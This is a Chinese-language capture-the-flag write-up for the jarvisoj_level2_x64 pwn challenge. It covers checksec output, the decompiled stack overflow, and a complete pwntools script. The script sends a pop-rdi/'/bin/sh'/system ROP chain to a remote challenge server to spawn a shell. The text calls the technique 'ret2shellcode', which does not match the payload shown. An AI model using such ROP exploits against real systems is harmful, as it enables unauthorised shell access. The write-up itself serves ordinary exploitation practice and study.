1
2
3
4
5
6
7
└─# checksec pwn  
[*] '/mnt/e/work/PWN/buuctf/jarvisoj_level2_x64/pwn'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

狗屎开了NX 又是一眼shellcode不就是叫你踩坑吗 服了

IDA64

1
2
3
4
5
int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function(argc, argv, envp);
  return system("echo 'Hello World!'");
}
1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  system("echo Input:");
  return read(0, buf, 0x200uLL);
}

可以知道offset=0x80+0x8

1
2
3
4
data:0000000000600A90                               public hint
.data:0000000000600A90 2F 62 69 6E 2F 73 68 00       hint db '/bin/sh',0
.data:0000000000600A90                               _data ends
.data:0000000000600A90

找到/bin/sh的datasystem_data =0x600A90

容易知道这题是ret2shellcode

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")
#io = process("./pwn")
io = remote("node4.buuoj.cn",26304)
def debug():
    gdb.attach(io)
    pause()
#debug()
offset=0x80+0x8
shell_data = 0x600A90
system_addr= 0x4004C0
pop_rdi = 0x4006b3
ret_addr = 0x404a1
payload = cyclic(offset)+p64(pop_rdi)+p64(shell_data)+p64(system_addr)
io.sendline(payload)
io.interactive()

注意!本地打记得栈对齐! movaps xmmword ptr [rsp + 0x50], xmm0